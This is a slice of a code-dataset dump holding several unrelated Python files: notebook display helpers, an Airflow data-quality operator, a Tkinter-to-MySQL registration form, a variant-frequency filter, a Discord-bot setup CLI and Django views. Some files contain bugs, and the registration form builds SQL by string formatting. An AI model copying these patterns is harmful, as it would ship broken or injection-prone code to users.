processing')\nplt.legend(loc=1)\nplt.show()\n\n","sub_path":"analysis/ec1/pcaIon.py","file_name":"pcaIon.py","file_ext":"py","file_size_in_byte":4993,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"183387349","text":"#!/usr/bin/env python\n\nfrom IPython.display import display, Markdown, Math, Latex\nfrom cycler import cycler\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport sympy as sp\nimport string\n\ndef head(exp):\n display(Markdown(\"### \" + exp))\n\ndef subhead(exp):\n display(Markdown(\"#### \" + exp))\n\ndef desc(exp):\n display(Markdown(\"*\" + exp + \"*\"))\n\ndef pycode(exp, description=None):\n display(Markdown(\"```python\\n\" + exp + \"```\"))\n if description is not None:\n display(Markdown(\"*\" + description + \"*\"))\n #display( eval(exp) )\n print(\"\")\n print(\"\")\n\ndef print_matrix(nd, format_str=\"{:.2f}\", max_vertex_row=6, font_size=\"small\"):\n s = \"{\\\\\" + font_size + \" \\n\\\\begin{bmatrix}\\n\" \n for ir, r in enumerate(nd):\n try:\n for ic, c in enumerate(r):\n s += str(c) if nd.dtype.name[0:3]=='int' else format_str.format(c)\n if ic < len(r)-1:\n s += \"& \"\n s += \"\\\\\\\\\\n\"\n except TypeError:\n if ir>0 and ir % max_vertex_row == 0:\n s += \"\t…\\\\\\\\\\n\" \n s += str(r) if nd.dtype.name[0:3]=='int' else format_str.format(r)\n if ir < len(nd)-1:\n s += \"& \"\n s += \"\\n\\\\end{bmatrix}\\n}\"\n display(Math( s 
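As an aside, the `getStd` helper above appends to an undefined name `comp` and would return the empty `stdComp`; the main path below it standardizes inline instead, which is the pattern sketched here. The 21x386 shape mirrors 21 files by (MZEND - MZSTART + 1) m/z bins, but the data is random for illustration.

```python
import numpy as np
from sklearn.preprocessing import StandardScaler
from sklearn.decomposition import PCA

rng = np.random.default_rng(0)
X = rng.normal(size=(21, 386))               # 21 samples, 386 intensity bins

X_std = StandardScaler().fit_transform(X)    # zero mean, unit variance per bin
Y = PCA(n_components=2).fit_transform(X_std) # project onto first two PCs
print(Y.shape)                               # (21, 2): one point per file
```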
))\n \ndef print_table(array):\n\n \"\"\" Input: Python list with rows of table as lists\n First element as header. \n Output: String to put into a .md file \n \n Ex Input: \n [[\"Name\", \"Age\", \"Height\"],\n [\"Jake\", 20, 5'10],\n [\"Mary\", 21, 5'7]] \n \"\"\"\n\n\n markdown = \"\\n\" + str(\"| \")\n\n for e in array[0]:\n to_add = \" \" + str(e) + str(\" |\")\n markdown += to_add\n markdown += \"\\n\"\n\n markdown += '|'\n for i in range(len(array[0])):\n markdown += str(\"-------------- | \")\n markdown += \"\\n\"\n\n for entry in array[1:]:\n markdown += str(\"| \")\n for e in entry:\n to_add = str(e) + str(\" | \")\n markdown += to_add\n markdown += \"\\n\"\n\n display( Markdown( markdown + \"\\n\" ))\n\ndef ndarray_props(a, typename=None):\n descriptions = {\n 'base': 'Base class',\n 'data': 'Mem location',\n 'dtype': 'Element datatype',\n 'itemsize': 'Item size',\n 'ndim': '# Dimensions',\n 'nbytes': '# Bytes',\n 'newbyteorder': 'New byte order',\n 'shape': 'Shape',\n 'size': 'Size',\n 'strides': 'Strides'\n }\n if typename == None:\n typename = a.dtype\n\n subhead(f'NDArray properties for {typename}')\n table = [[v, f'arr.{k}', f'{ getattr(a, k) }'] for k,v in descriptions.items()]\n table.insert(0, ['Description', 'Property', 'Value'])\n print_table(table)\n\ndef ndarray_flags(a):\n subhead('NDArray flags')\n flag_Table = [r.split(':') for r in str(a.flags).split('\\n')]\n flag_Table.insert(0, ['Flag', 'Value'])\n print_table( flag_Table )\n \ndef lb():\n display(Markdown(\"----\"))\n\ndef configure_plot(xlim, ylim, figsize=(12, 8), subplots=1, colors=['teal', 'seagreen', 'blue', 'limegreen', 'royalblue', 'deepskyblue', 'slateblue'] ):\n fig = plt.figure(figsize=figsize)\n plt.rc('axes', prop_cycle=(cycler('color', colors)))\n plt.xlim(xlim[0], xlim[1])\n plt.ylim(ylim[0], ylim[1])\n if (subplots==1):\n return plt\n elif (subplots==2):\n p1 = configure_subplot(fig.add_subplot(1,2,1))\n p2 = configure_subplot(fig.add_subplot(1,2,2))\n return p1, p2\n\ndef configure_subplot(sp):\n sp.grid(True, which='both', color='lavender')\n sp.axhline(y=0, color='lightsteelblue')\n sp.axvline(x=0, color='lightsteelblue')\n return sp\n\ndef print_eq(*args):\n formated_lines = [l[0].format(*[sp.latex(a) for a in l[1:]]) for l in args]\n s = '\\\\begin{equation}\\n'\n s += '\\\\begin{split}\\n'\n s += ' \\\\\\\\\\n'.join(formated_lines) + ' \\\\\\\\\\n'\n s += '\\\\end{split}\\n'\n s += '\\\\end{equation}'\n display(Math(s))","sub_path":"notebooks/python-data-science/.ipynb_checkpoints/display_helpers-checkpoint.py","file_name":"display_helpers-checkpoint.py","file_ext":"py","file_size_in_byte":3922,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"193400601","text":"from airflow.hooks.postgres_hook import PostgresHook\nfrom airflow.models import BaseOperator\nfrom airflow.utils.decorators import apply_defaults\n\nclass DataQualityOperator(BaseOperator):\n '''\n Dag Operator for running data quality queries and comparing the output to expected output\n '''\n ui_color = '#89DA59'\n\n @apply_defaults\n def __init__(self,\n redshift_conn_id=\"\",\n check_query=\"\",\n expected_count=\"\",\n *args, **kwargs):\n\n super(DataQualityOperator, self).__init__(*args, **kwargs)\n self.conn_id = redshift_conn_id\n self.check_query = check_query\n self.expected_count = expected_count\n\n def execute(self, context):\n self.log.info('Running Data quality checks')\n redshift = PostgresHook(postgres_conn_id = self.conn_id)\n \n data_quality_check_sql = 
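A usage sketch for the `print_table` helper above, mirroring its docstring example. It renders through `IPython.display`, so it is meant to run inside a notebook where the helper module is imported.

```python
rows = [
    ["Name", "Age", "Height"],   # first row becomes the header
    ["Jake", 20, "5'10"],
    ["Mary", 21, "5'7"],
]
print_table(rows)                # renders a Markdown table in the cell output
```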
self.check_query\n rec_count = redshift.get_records(data_quality_check_sql)\n num_records = rec_count[0][0]\n if num_records > self.expected_count:\n raise ValueError(f\"Data quality check failed. {rec_count[0][0]} does not match expected count {self.expected_count}\")\n self.log.error(f\"Data quality check failed. {rec_count[0][0]} does not match expected count {self.expected_count}\")\n \n self.log.info(\"Data quality check passed\")\n ","sub_path":"capstone/plugins/operators/data_quality.py","file_name":"data_quality.py","file_ext":"py","file_size_in_byte":1399,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"73788176","text":"from tkinter import *\r\nfrom tokenize import u\r\n\r\nimport pymysql\r\n\r\ndef sub():\r\n d1 = {1: \"Male\", 2: \"Female\"}\r\n selection = d1[var.get()]\r\n d = {1: \"Python\", 2: \"Angular\", 3: \"React\"}\r\n lb = ''\r\n for l in li:\r\n a = l.get()\r\n if a > 0:\r\n sele = d[a]\r\n lb = lb +\" \"+ sele\r\n else:\r\n sele = \"\"\r\n lb = lb + sele\r\n print(var1.get(),\"ye\")\r\n print(selection)\r\n print(lb)\r\n db = pymysql.connect(\"localhost\", \"root\", \"\", \"user\")\r\n if db:\r\n cursor = db.cursor(pymysql.cursors.DictCursor)\r\n # data = cursor.execute(\"Select * from user\")\r\n data = cursor.execute('''CREATE TABLE User(NAME CHAR(50) NOT NULL, GENDER CHAR(10), SKILLS CHAR(50) )''')\r\n for i in range(0, len(u.li), 2):\r\n s = u.li[i]\r\n t = u.li[i + 1]\r\n dat = cursor.execute(\r\n '''INSERT INTO User (FNAME,LNAME) VALUES ('{0}','{1}','{2}')'''.format(var1.get(), selection, lb))\r\n db.commit()\r\n\r\n\r\ntop = Tk()\r\nli=[IntVar(), IntVar(), IntVar()]\r\nvar = IntVar()\r\nvar1 = StringVar()\r\nframe1 = Frame(top, width=300,height=700)\r\nframe2 = Frame(top, width=300,height=700)\r\nframe3 = Frame(top, width=300,height=700)\r\nframe4 = Frame(top, width=300,height=700)\r\nlabel=Label(frame1)\r\nlabel.config(text = \"Name: \")\r\nlabel.pack(side = LEFT)\r\nE1 = Entry(frame1, bd = 1, textvariable= var1)\r\nE1.pack(side = RIGHT)\r\nlabel=Label(frame2)\r\nlabel.config(text = \"Gender: \")\r\nlabel.pack(side = LEFT)\r\n\r\nR1 = Radiobutton(frame2, text = \"Male\",\r\n\t\t\t\tvariable = var,\r\n\t\t\t\tvalue = 1,\r\n )\r\n\r\nR2 = Radiobutton(frame2, text = \"Female\",\r\n\t\t\t\tvariable = var,\r\n\t\t\t\tvalue = 2\r\n )\r\n\r\nR2.pack(side= RIGHT)\r\nR1.pack(side= RIGHT)\r\nlabel=Label(frame3)\r\nlabel.config(text = \"Skills: \")\r\nlabel.pack(side = LEFT)\r\nC1 = Checkbutton(frame3, text = \"Python\",\r\n\t\t\t\tvariable = li[0],\r\n onvalue = 1,\r\n\t\t\t\t offvalue = 0,\r\n\t\t\t\t)\r\nC2 = Checkbutton(frame3,\r\n\t\t\t\ttext = \"Angular\",\r\n\t\t\t\tvariable = li[1],\r\n onvalue = 2,\r\n\t\t\t\t offvalue = 0,\r\n\t\t\t\t )\r\nC3 = Checkbutton(frame3,\r\n\t\t\t\ttext = \"React\",\r\n\t\t\t\tvariable = li[2],\r\n onvalue = 3,\r\n\t\t\t\t offvalue = 0,\r\n\t\t\t\t )\r\nC1.pack()\r\nC2.pack()\r\nC3.pack()\r\nL1 = Button(frame4, text = \"Submit\", command=sub)\r\nL1.pack()\r\nframe1.pack()\r\nframe2.pack()\r\nframe3.pack()\r\nframe4.pack()\r\ntop.mainloop()","sub_path":"Day5/Registration.py","file_name":"Registration.py","file_ext":"py","file_size_in_byte":2387,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"254914548","text":"import pandas as pd\n\ndef create_chosen_mutation_from_freqs(freq_file, output_dir, run_name, freq_threshold = 0.001, prob_threshold = 0.85,\n coverage_threshold = 1000, range = (0, 100000)):\n\n freqs = 
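In the operator above, the `self.log.error` call sits after the `raise`, so it can never run. A sketch of the method body with the order fixed, and with a failure message that matches the `>` comparison actually performed; this is the same `execute` contract, shown in isolation.

```python
def execute(self, context):
    self.log.info("Running Data quality checks")
    redshift = PostgresHook(postgres_conn_id=self.conn_id)
    num_records = redshift.get_records(self.check_query)[0][0]
    if num_records > self.expected_count:
        msg = (f"Data quality check failed. {num_records} records "
               f"exceed expected count {self.expected_count}")
        self.log.error(msg)      # log first, then raise
        raise ValueError(msg)
    self.log.info("Data quality check passed")
```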
pd.read_csv(freq_file, sep='\\t')\n\n invalid_ref_positions = set(freqs[(freqs['Rank'] == 0) & (freqs['Ref'] != freqs['Base']) & (freqs['Ref'] != '-')]['Pos'].tolist())\n print('len(invalid_ref_positions): {}'.format(len(invalid_ref_positions)))\n\n chosen_mutations = freqs[(freqs['Rank'] != 0) # all minor variants\n & (freqs['Freq'] > freq_threshold)\n & (freqs['Prob'] > prob_threshold)\n & (freqs['Ref'] != '-') # remove insertions\n & ( ~(freqs['Pos'].isin(invalid_ref_positions)) )\n & (freqs['Pos'] >= range[0]) & (freqs['Pos'] < range[1])\n & (freqs['Read_count'] > coverage_threshold)]\n\n print(len(chosen_mutations))\n\n chosen_mutations['variant'] = chosen_mutations['Ref'] + chosen_mutations['Pos'].astype(str) + chosen_mutations['Base']\n\n # extract\n mutations_filename = 'chosen_mutations_{}'.format(run_name)\n chosen_mutations['variant'].to_csv('{}/{}.csv'.format(output_dir, mutations_filename), header= True, index=False)\n # chosen_mutations.to_csv('{}/{}_with_details.csv'.format(output_dir, mutations_filename), index=False)\n\n\ndef main_hiv_shafer_loop():\n loop_freq_files_root = '/Volumes/STERNADILABHOME$/volume1/shared/analysis/HIV_shafer/loop_genomics_pipeline/envs_output'\n output_root = '/Volumes/STERNADILABHOME$/volume1/shared/analysis/HIV_shafer/associvar'\n samples = ['env10', 'env11', 'env12', 'env13', 'env14', 'env15', 'env3', 'env4', 'env5', 'env6',\n 'env7', 'env8', 'env9']\n for sample in samples:\n print('Sample: {}'.format(sample))\n freq_file = '{}/{}/pipeline_3/s{}.freqs'.format(loop_freq_files_root, sample, sample[3:])\n output_dir = '{}/{}'.format(output_root, sample)\n\n create_chosen_mutation_from_freqs(freq_file,\n output_dir,\n run_name = 'contigB_freq0.1',\n freq_threshold = 0.001,\n range = (1000, 3051))\n\n\nif __name__ == '__main__':\n\n main_hiv_shafer_loop()","sub_path":"loop_genomics_haplotype_analysis/create_chosen_mutation_from_freqs.py","file_name":"create_chosen_mutation_from_freqs.py","file_ext":"py","file_size_in_byte":2428,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"91689121","text":"#!/usr/bin/env python3\nimport asyncio\nimport json\nimport os\nimport sys\nimport tarfile\nfrom copy import deepcopy\nfrom datetime import datetime as dt\nfrom pathlib import Path\nimport logging\n\nimport appdirs\nimport click\n\nimport bluebot.logging\nfrom bluebot.core.cli import confirm\nfrom bluebot.core.data_manager import (\n basic_config_default,\n load_basic_configuration,\n instance_name,\n basic_config,\n cog_data_path,\n core_data_path,\n storage_details,\n)\nfrom bluebot.core.json_io import JsonIO\nfrom bluebot.core.utils import safe_delete\nfrom bluebot.core import Config\nfrom bluebot.core.drivers import BackendType, IdentifierData\nfrom bluebot.core.drivers.red_json import JSON\n\nconversion_log = logging.getLogger(\"blue.converter\")\n\nconfig_dir = None\nappdir = appdirs.AppDirs(\"Blue-DiscordBot\")\nif sys.platform == \"linux\":\n if 0 < os.getuid() < 1000:\n config_dir = Path(appdir.site_data_dir)\nif not config_dir:\n config_dir = Path(appdir.user_config_dir)\ntry:\n config_dir.mkdir(parents=True, exist_ok=True)\nexcept PermissionError:\n print(\"You don't have permission to write to '{}'\\nExiting...\".format(config_dir))\n sys.exit(1)\nconfig_file = config_dir / \"config.json\"\n\n\ndef load_existing_config():\n if not config_file.exists():\n return {}\n\n return JsonIO(config_file)._load_json()\n\n\ninstance_data = load_existing_config()\nif instance_data is None:\n 
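A minimal sketch of one pitfall in the filtering step above: assigning the `variant` column on the chained-filter result can trigger pandas' `SettingWithCopyWarning`; taking an explicit `.copy()` first avoids it. Column names match the freqs file; the values are made up.

```python
import pandas as pd

freqs = pd.DataFrame({"Ref": ["A", "C"], "Pos": [101, 202], "Base": ["G", "T"]})
chosen = freqs[freqs["Pos"] > 100].copy()    # explicit copy of the slice
chosen["variant"] = chosen["Ref"] + chosen["Pos"].astype(str) + chosen["Base"]
print(chosen["variant"].tolist())            # ['A101G', 'C202T']
```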
instance_list = []\nelse:\n instance_list = list(instance_data.keys())\n\n\ndef save_config(name, data, remove=False):\n config = load_existing_config()\n if remove and name in config:\n config.pop(name)\n else:\n if name in config:\n print(\n \"WARNING: An instance already exists with this name. \"\n \"Continuing will overwrite the existing instance config.\"\n )\n if not confirm(\"Are you absolutely certain you want to continue (y/n)? \"):\n print(\"Not continuing\")\n sys.exit(0)\n config[name] = data\n JsonIO(config_file)._save_json(config)\n\n\ndef get_data_dir():\n default_data_dir = Path(appdir.user_data_dir)\n\n print(\n \"Hello! Before we begin the full configuration process we need to\"\n \" gather some initial information about where you'd like us\"\n \" to store your bot's data. We've attempted to figure out a\"\n \" sane default data location which is printed below. If you don't\"\n \" want to change this default please press [ENTER], otherwise\"\n \" input your desired data location.\"\n )\n print()\n print(\"Default: {}\".format(default_data_dir))\n\n new_path = input(\"> \")\n\n if new_path != \"\":\n new_path = Path(new_path)\n default_data_dir = new_path\n\n if not default_data_dir.exists():\n try:\n default_data_dir.mkdir(parents=True, exist_ok=True)\n except OSError:\n print(\n \"We were unable to create your chosen directory.\"\n \" You may need to restart this process with admin\"\n \" privileges.\"\n )\n sys.exit(1)\n\n print(\"You have chosen {} to be your data directory.\".format(default_data_dir))\n if not confirm(\"Please confirm (y/n):\"):\n print(\"Please start the process over.\")\n sys.exit(0)\n return default_data_dir\n\n\ndef get_storage_type():\n storage_dict = {1: \"JSON\", 2: \"MongoDB\"}\n storage = None\n while storage is None:\n print()\n print(\"Please choose your storage backend (if you're unsure, choose 1).\")\n print(\"1. JSON (file storage, requires no database).\")\n print(\"2. MongoDB\")\n storage = input(\"> \")\n try:\n storage = int(storage)\n except ValueError:\n storage = None\n else:\n if storage not in storage_dict:\n storage = None\n return storage\n\n\ndef get_name():\n name = \"\"\n while len(name) == 0:\n print()\n print(\n \"Please enter a name for your instance, this name cannot include spaces\"\n \" and it will be used to run your bot from here on out.\"\n )\n name = input(\"> \")\n if \" \" in name:\n name = \"\"\n return name\n\n\ndef basic_setup():\n \"\"\"\n Creates the data storage folder.\n :return:\n \"\"\"\n\n default_data_dir = get_data_dir()\n\n default_dirs = deepcopy(basic_config_default)\n default_dirs[\"DATA_PATH\"] = str(default_data_dir.resolve())\n\n storage = get_storage_type()\n\n storage_dict = {1: BackendType.JSON, 2: BackendType.MONGO}\n storage_type: BackendType = storage_dict.get(storage, BackendType.JSON)\n default_dirs[\"STORAGE_TYPE\"] = storage_type.value\n\n if storage_type == BackendType.MONGO:\n from bluebot.core.drivers.red_mongo import get_config_details\n\n default_dirs[\"STORAGE_DETAILS\"] = get_config_details()\n else:\n default_dirs[\"STORAGE_DETAILS\"] = {}\n\n name = get_name()\n save_config(name, default_dirs)\n\n print()\n print(\n \"Your basic configuration has been saved. 
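A usage sketch for `save_config` above; the instance name and paths are made-up examples. Note that if the name already exists, the function warns and prompts for confirmation before overwriting; a second call with `remove=True` deletes the entry again.

```python
save_config("myinstance", {"DATA_PATH": "/tmp/red-data",
                           "STORAGE_TYPE": "JSON",
                           "STORAGE_DETAILS": {}})
save_config("myinstance", {}, remove=True)   # pops the entry from config.json
```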
Please run `bluebot ` to\"\n \" continue your setup process and to run the bot.\"\n )\n\n\ndef get_current_backend(instance) -> BackendType:\n return BackendType(instance_data[instance][\"STORAGE_TYPE\"])\n\n\ndef get_target_backend(backend) -> BackendType:\n if backend == \"json\":\n return BackendType.JSON\n elif backend == \"mongo\":\n return BackendType.MONGO\n\n\nasync def json_to_mongov2(instance):\n instance_vals = instance_data[instance]\n current_data_dir = Path(instance_vals[\"DATA_PATH\"])\n\n load_basic_configuration(instance)\n\n from bluebot.core.drivers import red_mongo\n\n storage_details = red_mongo.get_config_details()\n\n core_conf = Config.get_core_conf()\n new_driver = red_mongo.Mongo(cog_name=\"Core\", identifier=\"0\", **storage_details)\n\n core_conf.init_custom(\"CUSTOM_GROUPS\", 2)\n custom_group_data = await core_conf.custom(\"CUSTOM_GROUPS\").all()\n\n curr_custom_data = custom_group_data.get(\"Core\", {}).get(\"0\", {})\n exported_data = await core_conf.driver.export_data(curr_custom_data)\n conversion_log.info(\"Starting Core conversion...\")\n await new_driver.import_data(exported_data, curr_custom_data)\n conversion_log.info(\"Core conversion complete.\")\n\n for p in current_data_dir.glob(\"cogs/**/settings.json\"):\n cog_name = p.parent.stem\n if \".\" in cog_name:\n # Garbage handler\n continue\n with p.open(mode=\"r\") as f:\n cog_data = json.load(f)\n for identifier, all_data in cog_data.items():\n try:\n conf = Config.get_conf(None, int(identifier), cog_name=cog_name)\n except ValueError:\n continue\n new_driver = red_mongo.Mongo(\n cog_name=cog_name, identifier=conf.driver.unique_cog_identifier, **storage_details\n )\n\n curr_custom_data = custom_group_data.get(cog_name, {}).get(identifier, {})\n\n exported_data = await conf.driver.export_data(curr_custom_data)\n conversion_log.info(f\"Converting {cog_name} with identifier {identifier}...\")\n await new_driver.import_data(exported_data, curr_custom_data)\n\n conversion_log.info(\"Cog conversion complete.\")\n\n return storage_details\n\n\nasync def mongov2_to_json(instance):\n load_basic_configuration(instance)\n\n core_path = core_data_path()\n\n from bluebot.core.drivers import red_json\n\n core_conf = Config.get_core_conf()\n new_driver = red_json.JSON(cog_name=\"Core\", identifier=\"0\", data_path_override=core_path)\n\n core_conf.init_custom(\"CUSTOM_GROUPS\", 2)\n custom_group_data = await core_conf.custom(\"CUSTOM_GROUPS\").all()\n\n curr_custom_data = custom_group_data.get(\"Core\", {}).get(\"0\", {})\n exported_data = await core_conf.driver.export_data(curr_custom_data)\n conversion_log.info(\"Starting Core conversion...\")\n await new_driver.import_data(exported_data, curr_custom_data)\n conversion_log.info(\"Core conversion complete.\")\n\n collection_names = await core_conf.driver.db.list_collection_names()\n splitted_names = list(\n filter(\n lambda elem: elem[1] != \"\" and elem[0] != \"Core\",\n [n.split(\".\") for n in collection_names],\n )\n )\n\n ident_map = {} # Cogname: idents list\n for cog_name, category in splitted_names:\n if cog_name not in ident_map:\n ident_map[cog_name] = set()\n\n idents = await core_conf.driver.db[cog_name][category].distinct(\"_id.RED_uuid\")\n ident_map[cog_name].update(set(idents))\n\n for cog_name, idents in ident_map.items():\n for identifier in idents:\n curr_custom_data = custom_group_data.get(cog_name, {}).get(identifier, {})\n try:\n conf = Config.get_conf(None, int(identifier), cog_name=cog_name)\n except ValueError:\n continue\n exported_data 
= await conf.driver.export_data(curr_custom_data)\n\n new_path = cog_data_path(raw_name=cog_name)\n new_driver = red_json.JSON(cog_name, identifier, data_path_override=new_path)\n conversion_log.info(f\"Converting {cog_name} with identifier {identifier}...\")\n await new_driver.import_data(exported_data, curr_custom_data)\n\n # cog_data_path(raw_name=cog_name)\n\n conversion_log.info(\"Cog conversion complete.\")\n\n return {}\n\n\nasync def mongo_to_json(instance):\n load_basic_configuration(instance)\n\n from bluebot.core.drivers.red_mongo import Mongo\n\n m = Mongo(\"Core\", \"0\", **storage_details())\n db = m.db\n collection_names = await db.list_collection_names()\n for collection_name in collection_names:\n if \".\" in collection_name:\n # Fix for one of Zeph's problems\n continue\n elif collection_name == \"Core\":\n c_data_path = core_data_path()\n else:\n c_data_path = cog_data_path(raw_name=collection_name)\n c_data_path.mkdir(parents=True, exist_ok=True)\n # Every cog name has its own collection\n collection = db[collection_name]\n async for document in collection.find():\n # Every cog has its own document.\n # This means if two cogs have the same name but different identifiers, they will\n # be two separate documents in the same collection\n cog_id = document.pop(\"_id\")\n if not isinstance(cog_id, str):\n # Another garbage data check\n continue\n elif not str(cog_id).isdigit():\n continue\n driver = JSON(collection_name, cog_id, data_path_override=c_data_path)\n for category, value in document.items():\n ident_data = IdentifierData(str(cog_id), category, (), (), {})\n await driver.set(ident_data, value=value)\n return {}\n\n\nasync def edit_instance():\n instance_list = load_existing_config()\n if not instance_list:\n print(\"No instances have been set up!\")\n return\n\n print(\n \"You have chosen to edit an instance. The following \"\n \"is a list of instances that currently exist:\\n\"\n )\n for instance in instance_list.keys():\n print(\"{}\\n\".format(instance))\n print(\"Please select one of the above by entering its name\")\n selected = input(\"> \")\n\n if selected not in instance_list.keys():\n print(\"That isn't a valid instance!\")\n return\n instance_data = instance_list[selected]\n default_dirs = deepcopy(basic_config_default)\n\n current_data_dir = Path(instance_data[\"DATA_PATH\"])\n print(\"You have selected '{}' as the instance to modify.\".format(selected))\n if not confirm(\"Please confirm (y/n):\"):\n print(\"Ok, we will not continue then.\")\n return\n\n print(\"Ok, we will continue on.\")\n print()\n if confirm(\"Would you like to change the instance name? (y/n)\"):\n name = get_name()\n else:\n name = selected\n\n if confirm(\"Would you like to change the data location? (y/n)\"):\n default_data_dir = get_data_dir()\n default_dirs[\"DATA_PATH\"] = str(default_data_dir.resolve())\n else:\n default_dirs[\"DATA_PATH\"] = str(current_data_dir.resolve())\n\n if name != selected:\n save_config(selected, {}, remove=True)\n save_config(name, default_dirs)\n\n print(\"Your basic configuration has been edited\")\n\n\nasync def create_backup(instance):\n instance_vals = instance_data[instance]\n if confirm(\"Would you like to make a backup of the data for this instance? 
(y/n)\"):\n load_basic_configuration(instance)\n if instance_vals[\"STORAGE_TYPE\"] == \"MongoDB\":\n await mongo_to_json(instance)\n print(\"Backing up the instance's data...\")\n backup_filename = \"redv3-{}-{}.tar.gz\".format(\n instance, dt.utcnow().strftime(\"%Y-%m-%d %H-%M-%S\")\n )\n pth = Path(instance_vals[\"DATA_PATH\"])\n if pth.exists():\n backup_pth = pth.home()\n backup_file = backup_pth / backup_filename\n\n to_backup = []\n exclusions = [\n \"__pycache__\",\n \"Lavalink.jar\",\n os.path.join(\"Downloader\", \"lib\"),\n os.path.join(\"CogManager\", \"cogs\"),\n os.path.join(\"RepoManager\", \"repos\"),\n ]\n from bluebot.core.downloader.repo_manager import RepoManager\n\n repo_mgr = RepoManager()\n repo_output = []\n for _, repo in repo_mgr._repos:\n repo_output.append({\"url\": repo.url, \"name\": repo.name, \"branch\": repo.branch})\n repo_filename = pth / \"cogs\" / \"RepoManager\" / \"repos.json\"\n with open(str(repo_filename), \"w\") as f:\n f.write(json.dumps(repo_output, indent=4))\n instance_vals = {instance_name: basic_config}\n instance_file = pth / \"instance.json\"\n with open(str(instance_file), \"w\") as instance_out:\n instance_out.write(json.dumps(instance_vals, indent=4))\n for f in pth.glob(\"**/*\"):\n if not any(ex in str(f) for ex in exclusions):\n to_backup.append(f)\n with tarfile.open(str(backup_file), \"w:gz\") as tar:\n for f in to_backup:\n tar.add(str(f), recursive=False)\n print(\"A backup of {} has been made. It is at {}\".format(instance, backup_file))\n\n\nasync def remove_instance(instance):\n await create_backup(instance)\n\n instance_vals = instance_data[instance]\n if instance_vals[\"STORAGE_TYPE\"] == \"MongoDB\":\n from bluebot.core.drivers.red_mongo import Mongo\n\n m = Mongo(\"Core\", **instance_vals[\"STORAGE_DETAILS\"])\n db = m.db\n collections = await db.collection_names(include_system_collections=False)\n for name in collections:\n collection = await db.get_collection(name)\n await collection.drop()\n else:\n pth = Path(instance_data[\"DATA_PATH\"])\n safe_delete(pth)\n save_config(instance, {}, remove=True)\n print(\"The instance {} has been removed\\n\".format(instance))\n\n\nasync def remove_instance_interaction():\n if not instance_list:\n print(\"No instances have been set up!\")\n return\n\n print(\n \"You have chosen to remove an instance. 
The following \"\n \"is a list of instances that currently exist:\\n\"\n )\n for instance in instance_data.keys():\n print(\"{}\\n\".format(instance))\n print(\"Please select one of the above by entering its name\")\n selected = input(\"> \")\n\n if selected not in instance_data.keys():\n print(\"That isn't a valid instance!\")\n return\n\n await create_backup(selected)\n await remove_instance(selected)\n\n\n@click.group(invoke_without_command=True)\n@click.option(\"--debug\", type=bool)\n@click.pass_context\ndef cli(ctx, debug):\n level = logging.DEBUG if debug else logging.INFO\n bluebot.logging.init_logging(level=level, location=Path.cwd() / \"red_setup_logs\")\n if ctx.invoked_subcommand is None:\n basic_setup()\n\n\n@cli.command()\n@click.argument(\"instance\", type=click.Choice(instance_list))\ndef delete(instance):\n loop = asyncio.get_event_loop()\n loop.run_until_complete(remove_instance(instance))\n\n\n@cli.command()\n@click.argument(\"instance\", type=click.Choice(instance_list))\n@click.argument(\"backend\", type=click.Choice([\"json\", \"mongo\"]))\ndef convert(instance, backend):\n current_backend = get_current_backend(instance)\n target = get_target_backend(backend)\n\n default_dirs = deepcopy(basic_config_default)\n default_dirs[\"DATA_PATH\"] = str(Path(instance_data[instance][\"DATA_PATH\"]))\n\n loop = asyncio.get_event_loop()\n\n new_storage_details = None\n\n if current_backend == BackendType.MONGOV1:\n if target == BackendType.MONGO:\n raise RuntimeError(\n \"Please see conversion docs for updating to the latest mongo version.\"\n )\n elif target == BackendType.JSON:\n new_storage_details = loop.run_until_complete(mongo_to_json(instance))\n elif current_backend == BackendType.JSON:\n if target == BackendType.MONGO:\n new_storage_details = loop.run_until_complete(json_to_mongov2(instance))\n elif current_backend == BackendType.MONGO:\n if target == BackendType.JSON:\n new_storage_details = loop.run_until_complete(mongov2_to_json(instance))\n\n if new_storage_details is not None:\n default_dirs[\"STORAGE_TYPE\"] = target.value\n default_dirs[\"STORAGE_DETAILS\"] = new_storage_details\n save_config(instance, default_dirs)\n conversion_log.info(f\"Conversion to {target} complete.\")\n else:\n conversion_log.info(f\"Cannot convert {current_backend} to {target} at this time.\")\n\n\nif __name__ == \"__main__\":\n try:\n cli()\n except KeyboardInterrupt:\n print(\"Exiting...\")\n else:\n print(\"Exiting...\")\n","sub_path":"pypi_install_script/Blue-DiscordBot-3.2.0.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":17915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"165004629","text":"from django.shortcuts import render\nfrom django.http import HttpResponseRedirect\nfrom apps.courses.models import InstructorCourse\n\n\ndef homepage(request, template='', context = {}):\n template = 'common/homepage.html'\n return render(request, template, context)\n\n\ndef about(request, template='', context={}):\n template = 'common/about.html'\n return render(request, template, context)\n\n\ndef search(request, template='', context={}):\n query = request.GET.get('q', '')\n keyword_results = results = []\n if query:\n keyword_results = InstructorCourse.objects.filter(searchkeyword__keyword__in=query.split()).distinct()\n if keyword_results.count() == 1:\n return HttpResponseRedirect(keyword_results[0].get_absolute_url())\n results = InstructorCourse.objects.filter(content__icontains=query)\n return 
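A standalone sketch of the backup walk in `create_backup` above: glob the data path and skip excluded entries before adding files to the archive. The paths are examples and the exclusion list is trimmed for brevity.

```python
import tarfile
from pathlib import Path

pth = Path("/tmp/redv3-data")                    # example data path
exclusions = ["__pycache__", "Lavalink.jar"]

with tarfile.open("/tmp/redv3-backup.tar.gz", "w:gz") as tar:
    for f in pth.glob("**/*"):
        if not any(ex in str(f) for ex in exclusions):
            # recursive=False: directories are already walked by glob
            tar.add(str(f), recursive=False)
```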
